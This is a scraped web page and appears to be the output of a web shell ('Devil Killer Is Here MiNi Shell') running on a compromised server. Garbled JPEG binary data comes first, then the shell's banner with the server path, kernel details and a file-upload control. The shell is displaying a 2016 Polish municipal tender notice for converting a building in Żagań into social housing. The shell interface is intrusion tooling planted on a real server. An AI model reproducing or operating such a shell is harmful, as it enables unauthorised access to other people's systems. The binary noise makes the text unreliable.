JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/144579-N-2016.html

<p class="kh_header"><b>Żagań: PRZEBUDOWA BUDYNKU MIESZKALNEGO PRZY  ULICY PSTROWSKIEGO 12   W ŻAGANIU NA BYDYNEK SOCJALNY</b><br>
<b>Numer ogłoszenia: 144579 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA BUDYNKU MIESZKALNEGO PRZY  ULICY PSTROWSKIEGO 12   W ŻAGANIU NA BYDYNEK SOCJALNY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa budynku mieszkalnego przy ulicy Pstrowskiego 12 w Żaganiu na budynek socjalny,  w zakresie rozbiórki istniejącego budynku mieszkalnego i budowy nowego budynku zachowując jego dotychczasowy układ przestrzenny i architektoniczny z przystosowaniem na lokale socjalne.
Przedmiotem inwestycji jest przebudowa budynku mieszkalnego przy ul. Pstrowskiego 12                 w Żaganiu na budynek socjalny, wraz z dobudową ganku przydomowego i przebudową  budynku gospodarczego.  Obecny budynek posiada  zły stan techniczny jest zdegradowany  i nie spełnia wymogów  techniczno-użytkowych. Przedmiotowy budynek zlokalizowany na działce nr 1421/6 położonej na terenie otoczenia zespołu urbanistyczno-krajobrazowego Żagania wpisanego do rejestru zabytków pod nr 70 i 2169. Budynek - kamienica o trzech kondygnacjach nadziemnych,  w tym poddasze użytkowe  jak i budynek gospodarczy parterowy  znajdujący się na działce nr 1421/3 są własnością Gminy Żagań o statusie miejskim. Przebudowa budynku mieszkalnego i gospodarczego ma na celu dostosowanie budynków do obowiązujących warunków technicznych.  Budynek po przebudowie zachowa obecny stan architektoniczny i przestrzenny, nie nastąpią zmiany charakterystycznych parametrów, jak: kubatura, powierzchnia zabudowy, wysokość i długość ani liczba kondygnacji, nie zmieni się sposób użytkowania budynku. Zmianie poddany zostanie podział funkcjonalny budynku. Budynek mieścić będzie 12 lokali socjalnych z wydzielonymi do każdego lokalu łazienkami.                      
Lokale wyposażone będą w instalacje zimnej i ciepłej wody podgrzewanej w bojlerach elektrycznych, kanalizację sanitarna i elektryczną. Lokale ogrzewane będą za pomocą pieców kaflowych na paliwo stałe  i  łazienkowe grzejniki elektryczne. Kuchnie wyposażone będą w zlewozmywaki i kuchenkę elektryczną, łazienki z wc,  umywalkę i natrysk z brodzikiem. Przebudowie również poddany zostanie budynek gospodarczy z wydzieleniem 12 komórek gospodarczych.  Realizacja zadania ma na celu zaspokojenie zbiorczych potrzeb wspólnoty. 
Inwestycja  jest  współfinansowana ze środków Banku Gospodarstwa Krajowego                    w Warszawie.

3.2. Podstawowy zakres  przewidywanych  robót  obejmuje 
1. Roboty branży ogólnobudowlanej objęte  opracowaniem
Rozbiórka  budynku mieszkalnego i budynku gospodarczego.
Prace  fundamentowe  i hydroizolacyjne ścian fundamentowych.
Zasypanie piwnic.
Prace murowe, posadzkarskie  i żelbetowe związane z budową klatki schodowej.
Stropy  nad poszczególnymi kondygnacjami i poddaszem użytkowym.
Konstrukcja  dachowa, strop drewniany nad poddaszem użytkowym i pokrycie dachowe.
Stolarka okienna i drzwiowa.
Prace wykończeniowe. 
Elewacja budynku.

2. Roboty  branży instalacyjnej: 
Instalacje elektryczne  (oświetleniowa, gniazd wtykowych, zerowania, odgromowa, domofonowa).
Instalacje wody zimnej (wodociągowa z projektowanego przyłącza).
Instalacja ciepłej wody użytkowej  (z bojlerów elektrycznych). 
Instalacje sanitarne (odprowadzenie kanalizacji i ścieków projektowanym przyłączem).

3.3. Zakres   przewidywanych  robót  w szczególności obejmuje
1.   BRANŻA OGÓLNOBUDOWLANA
1.1. Roboty rozbiórkowe:
Demontaż  instalacji elektrycznych.
Demontaż  instalacji wodno-kanalizacyjnej.
Demontaż armatury i urządzeń sanitarnych.
Rozebranie pozostałości pokrycia i konstrukcji dachowej.
Demontaż stolarki okiennej i drzwiowej.
Rozbiórka ścianek działowych, kominów i klatki schodowej.
Rozbiórka stropów i ścian zewnętrznych do poziomu 0,40 m. 
Rozbiórka budynku gospodarczego.
Wywóz gruzu i utylizacja. 

1.2.  Zasypanie piwnic i prace fundamentowe 
Likwidacja piwnic poprzez zasypanie piaskiem lub pospółką z odpowiednim  warstwowym zagęszczeniem. 
Istniejące ściany fundamentowe należy poddać pracom  konserwacyjnym i izolacyjnym wykorzystując  nowoczesne technologie iniekcyjne, krzemionkowania, nanoszenia  warstwy szlamu ochronnego i nanoszenia warstw bitumiczni-polimerowych.

1.3. Prace murowe 
Ściany zewnętrzne murowane z bloczków betonowych  gr. 24 cm do wysokości 30 cm 
nad teren, powyżej z bloczków gazobetonowych gr. 24 cm na zaprawie  cienkowarstwowej, ocieplone styropianem  gr. 15 cm. Ściany wewnętrzne murowane z bloczków betonowych gr. 24 cm do wysokości 30 cm  nad teren, powyżej z bloczków gazobetonowych gr. 24 cm. 

1.4. Stropy
Nad parterem i I piętrem stropy ceramiczne typu POROTHERM 50  lub równoważne (belki prefabrykowane oparte na ścianach z wypełnieniem pustakami z zastosowaniem żeber rozdzielczych).  Nad poddaszem użytkowym strop drewniany (wg projektu).

1.5. Stolarka
Stolarka okienna nowa z profili PCV w kolorze białym (min. 5-cio komorowa) wyposażona  w 
okucia obwiedniowe i mikrowentylację. Okna połaciowe (dodatkowe doświetlenie pomieszczeń w części użytkowej poddasza) obrotowe obsługiwane za pomocą klamki z dwustopniowym mikrouchylaniem,  umieszczonej w dolnej części skrzydła.
Włazy dachowe. Stolarka drzwiowa wewnętrzna  (skrzydła drzwiowe płytowe  lakierowane, ościeżnice  stalowe, drzwi wejściowe wyposażone w zamek na wkładkę patentowa i wizjer, drzwi łazienkowe z podcieniem wentylacyjnym). Drzwi wejściowe zewnętrzne  (stalowe laminowane wyposażone w zamek na wkładkę  patentową). 

1.6. Tynki, malowanie, podłogi i posadzki
Tynki cementowo-wapienne tradycyjne z wyszpachlowaniem powierzchni. Malowanie ścian farbami akrylowymi wewnętrznymi w odcieniu  półmat w kolorach  jasnych ( do uzgodnienia z zamawiającym).  Ściany klatki schodowej do wysokości 1,60 m  wykonane tynkiem mozaikowym. Ściany łazienek do wysokości 1,80 m obłożone glazurą.
W kuchni opaska z  glazury  o wysokości 60 cm nad szafkami i zlewozmywakiem.
Posadzki (podbudowa, warstwa wyrównawcza , izolacja - zgodnie z projektem) z płytek gresowych. Sufity podwieszane nad poddaszem użytkowym (płyty gipsowo-kartonowe na konstrukcji drewnianej). Obudowa połaci dachowych (płytami gipsowo-kartonowymi  z izolacją wełną mineralną).
 
1.7.  Roboty nawierzchniowe i zagospodarowanie terenu 
Opaska wokół budynku z kostki betonowej gr. 8 cm na podbudowie z piasku i podsypce cementowo piaskowej 1 do 4 zwieńczona obrzeżami betonowymi. Plac gospodarczy na pojemniki na odpady stałe oraz ciąg pieszy wzdłuż budynku gospodarczego z kostki brukowej betonowej. Chodniki  do wejścia budynku z kostki betonowej.

2,.  BRANŻA INSTALACYJNA
2.1.  Branża elektryczna  - Zakres prac obejmuje
Wykonanie wlz i rozdzielnicy głównej.
Wykonanie wlz i rozdzielnice mieszkaniowe.
Instalacja oświetleniowa - kable YDY4(3)x1,5mm2 i gniazda wtykowe  kable YDYp 3x2,5mm2 lub równoważne 
Instalacja wyrównawcza  z ochroną od porażeń i  przepięciami.
Urządzenia elektryczne (kuchenka czteropalnikowa elektryczna z piekarnikiem, bojler elektryczny na ciepłą wodę użytkową, grzejnik elektryczny łazienkowy).
Instalacja przyzywowa i domofonowa.
Instalacja odgromowa.

2.2. Branża sanitarna:  
Przyłącze wody zimnej do budynku (rury PEHD PN 10 fi 40mm)   z punktem pomiarowym  (wodomierz główny DN 32  z zaworem antyskażeniowym  typu EA DN32)  lub równoważne.
Instalacja zimnej i ciepłej wody z rur typu PE-RT/A1/PE-HD  o ciśnieniu roboczym 1 MPa, wodomierze lokalowe DN 15,  lub równoważne.
Przyłącze kanalizacyjne (działka nr 1570) nowe w nowej studni i  nowe rurociągi PVC.
Kanalizacja deszczowa.
Piony i kanalizacja pozioma z rur PCV o podwyższonej wytrzymałości.

3.  BUDYNEK GOSPODARCZY 
Rozbiórka starego budynku.
Budowa nowego budynku gospodarczego z podziałem na 12 osobnych komórek gospodarczych. (ściany zewnętrzne z bloczków betonowych gr. 24cm, ściany działowe  z  bloczków gr. 14 cm, posadzka betonowa, konstrukcja dachowa drewniana jednospadowa  pokryta papą termozgrzewalną  - gont papowy ).

4.DANE LICZBOWE BUDYNKÓW
4.1. Budynek mieszkalny
Powierzchnia zabudowy budynku mieszkalnego - 180,56 m2
Powierzchnia rozbudowy (ganek) - 8,64 m2.
Liczba kondygnacji -3.
Liczba lokali mieszkalnych- 12.
Wysokość kondygnacji - 2,60 m.
Długość/szerokość/wysokość budynku mieszkalnego - 13,9 m/13,0 m/13,0 m.
Powierzchnia  całkowita użytkowa lokali socjalnych - 356,90 m2.
Powierzchnia użytkowa pojedynczego lokalu socjalnego:  min. 25,6 m2  -  max. 32,2 m2.
Powierzchnia komunikacji - 62,8 m2.
Kubatura  - 1259,10 m.

4.2.  Budynek gospodarczy   
Powierzchnia zabudowy - 64,9 m2.
Liczba kondygnacji - 1.
Liczba pomieszczeń (komórek lokatorskich) - 12.
Długość/szerokość/wysokość - 19,5 m/3,2 m/3,0 m.
Powierzchnia pomieszczeń gospodarczych - 49,20 m2.
Kubatura - 195,0  m2.

3.4. Szczegółowy zakres robót do wykonania zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót jako materiał pomocniczy, oraz uzgodnienia branżowe, natomiast szczegółowe obowiązki wykonawcy związane z przedmiotem zamówienia zawarte są  w projekcie umowy.  

3.5. Uzgodnienia branżowe: 
Wszystkie  roboty budowlane należy prowadzić w oparciu  o dostępne  uzgodnienia:
1. Lubuski Wojewódzki Konserwator Zabytków - decyzja nr ZN.5142.99.2015.[mŻag] z dn. 12.11.2015r. udzielająca pozwolenia na prowadzenie robót budowlanych. 

2. ENEA Operator sp. z o.o.  - warunki przyłączenia  do sieci elektroenergetycznej z dnia 03.09.2015r.

3. ŻW i K  Żagań -  warunki przyłączenia do sieci wod.-kan. z dnia 20.07.2015r. 
4. ŻW i K Żagań  - uzgodnienia projektowe (bez uwag) z dnia 02.11.2015r. 

3.6. W przypadku, gdy dokumentacja projektowa lub specyfikacja techniczna wykonania                i odbioru robót nie podają w sposób szczegółowy technologii wykonywania robót lub wykonania określonego elementu przedmiotu zamówienia, bądź też nie precyzują dostatecznie rodzaju i standardu materiałów, wykonawca zobowiązany jest do każdorazowego wcześniejszego uzyskania decyzji w tym zakresie od zamawiającego.

3.7. Szczegółowe obowiązki Wykonawcy związane z przedmiotem zamówienia są uregulowane w projekcie  umowy, stanowiącym załącznik SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.21.00.00-2, 45.40.00.00-1, 45.11.12.91-4, 45.31.12.00-2, 45.33.10.00-6, 45.33.23.00-6, 45.33.24.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Zamawiający  żąda od Wykonawców wniesienia wadium.

8.2. Wadium  w wysokości 42 000.00 zł, słownie: czterdzieści dwa tysiące złotych i 00/100  należy wnieść przed upływem terminu składania ofert. 

8.3. Wadium należy wnieść w jednej z niżej  wymienionych  form: 
1)  pieniądzu; 
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-  
     kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym; 
3)  gwarancjach bankowych; 
4)  gwarancjach ubezpieczeniowych; 
5)  poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 pkt  2 ustawy z 
     dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości (Dz.U.   
     Nr 109, poz.1158, z późn.zm). 

8.4. Wadium wnoszone w  pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego nr BZ WBK S.A. I O/ Żagań 39 1090 2558 0000 0006 4000 0101   i  przechowuje się na tym rachunku. 

8.5. Wadium wniesione w pieniądzu uznaje się za wniesione w sposób prawidłowy, gdy kwota wadium zostanie zaksięgowana  na wskazanym koncie  Zamawiającego nie później, jak przed upływem terminu składania ofert. 
Kopię  dowodu wpłaty wadium  Wykonawca dołącza do oferty. 

8.6. Dokument potwierdzający wniesienie wadium  w innej formie niż w pieniądzu winien być 
złożony w oryginale (odrębnie poza ofertą)  przed terminem składania ofert.

8.7. Wykonawca, którego  oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego  postępowania.

8.8. Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 

8.9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zwraca się  wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  

8.10. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który  wycofał ofertę przed upływem terminu składania ofert. 

8.11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.  

8.12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu  Zwrócono wadium na podstawie  pkt  8.8 SIWZ, jeżeli w wyniku  rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca  wnosi  wadium w terminie  określonym przez Zamawiającego.

8.13. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na  wezwanie, o którym mowa w  art.26 ust.3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie,   nie złożył  dokumentów lub  oświadczeń o którym mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt.5 ustawy Pzp, lub informacji o tym, ze nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej

8.14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana : 
1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie; 
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
      leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia   
     posiadania uprawnień do wykonywania działalności typu koncesja, zezwolenie, licencja,
     gdyż przepisy prawa nie nakładają obowiązku posiadania  takowych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten 
    wymóg Wykonawcę,  który w okresie ostatnich  pięciu lat przed upływem składania ofert , 
    a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie :  
    - wykonał co najmniej dwie roboty budowlane  odpowiadające swoim zakresem i wartością 
      robotom stanowiącym przedmiot zamówienia, polegające  na budowie/przebudowie/ 
      rozbudowie  budynku mieszkalnego wielorodzinnego o kubaturze nie mniejszej niż 850 
      m3 albo o wartości wszystkich robót budowlanych związanych budową /przebudową 
      /rozbudową  budynku mieszkalnego, nie mniejszej niż 1 mln zł. brutto.    
    Na potwierdzenie spełnienia  warunku w zakresie wiedzy i doświadczenia  Wykonawca 
    złoży wraz z ofertą dokument określony w punkcie 6.1  podpunkt 2 SIWZ,  wraz z
    wymaganymi poświadczeniami. 
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
    Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od   
    charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
    obowiązany jest udowodnić Zamawiającemu iż będzie dysponował tymi  zasobami  w 
    trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  :  pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
    potrzeby  wykonania zamówienia, w jakim zakresie i na jaki okres oddaje  mu zasoby  
    oraz  składając dokumenty dotyczące tego podmiotu określone w punkcie  6.2 SIWZ.  
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów 
    przy realizacji zamówienia, chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania  osobami zdolnymi  do wykonania zamówienia, Zamawiający 
    uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował osobami  
    posiadającymi uprawnienia niezbędne do wykonania zamówienia, a mianowicie:    
    - uprawnienia do kierowania  robotami budowlanymi w specjalności konstrukcyjno-  
      budowlanej bez ograniczeń  lub innymi uprawnieniami  umożliwiającymi wykonywanie 
      tych samych   czynności, do wykonywania których uprawniają w aktualnym stanie 
      prawnym  uprawnienia w w/w specjalnościach;
   - uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej  w 
      zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
      wodociągowych i kanalizacyjnych w ograniczonym zakresie  lub innymi uprawnieniami  
      umożliwiającymi wykonywanie tych  samych   czynności, do wykonywania których 
      uprawniają w aktualnym stanie prawnym  uprawnienia w w/w specjalnościach;
   - uprawnienia do kierowania robotami budowlanymi  w  specjalności instalacyjnej w 
      zakresie sieci, instalacji i  urządzeń elektrycznych i elektroenergetycznych w 
      ograniczonym zakresie, lub innymi uprawnieniami  umożliwiającymi wykonywanie tych  
      samych   czynności, do wykonywania których uprawniają w aktualnym stanie prawnym  
      uprawnienia w w/w specjalnościach.
   Na potwierdzenie spełnienia wszystkich warunków określonych w punkcie 5.5. podpunkt 3   
   Wykonawca złoży wraz z ofertą   dokument   (wykaz) określony w  punkcie 6.1 podpunkt 3 
   SIWZ. Dokument musi zawierać  wszystkie żądane przez Zamawiającego informacje.  
   Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
   W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca może 
   polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego łączących 
   go z nimi stosunków.  Wykonawca w takiej sytuacji obowiązany jest udowodnić    
   Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w    
   szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do 
   oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia,  w 
   jakim zakresie i na jaki okres oddaje mu zasoby  oraz składając dokumenty dotyczące tego 
   podmiotu określone w punkcie 6.2 SIWZ. 
   Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
   wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów (i
   w tym zakresie składa stosowne oświadczenie ), chyba że za  nieudostępnienie zasobów 
   nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający  żąda aby Wykonawca  
    znajdował się w sytuacji finansowej zapewniającej wykonanie zamówienia  i posiadał   
    środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 500 000,00 zł.
    Na potwierdzenie spełnienia tego warunku Wykonawca złoży  dokument określony w 
    punkcie 6.1 podpunkt 5.
    Wykonawca może polegać na potencjale finansowym  innych podmiotów, niezależnie od 
    Charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji 
    obowiązany jest  udowodnić    Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
    trakcie realizacji zamówienia, w    szczególności przedstawiając w tym celu  pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
    potrzeby  wykonania zamówienia,  w jakim zakresie i na jaki okres oddaje mu zasoby  
    oraz składając  dokumenty dotyczące tego podmiotu określone w punkcie 6.2 SIWZ. 
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów 
    (i w tym zakresie składa stosowne oświadczenie ), chyba że za  nieudostępnienie 
    zasobów nie ponosi  winy.</p>
</li></ul></li></ul>
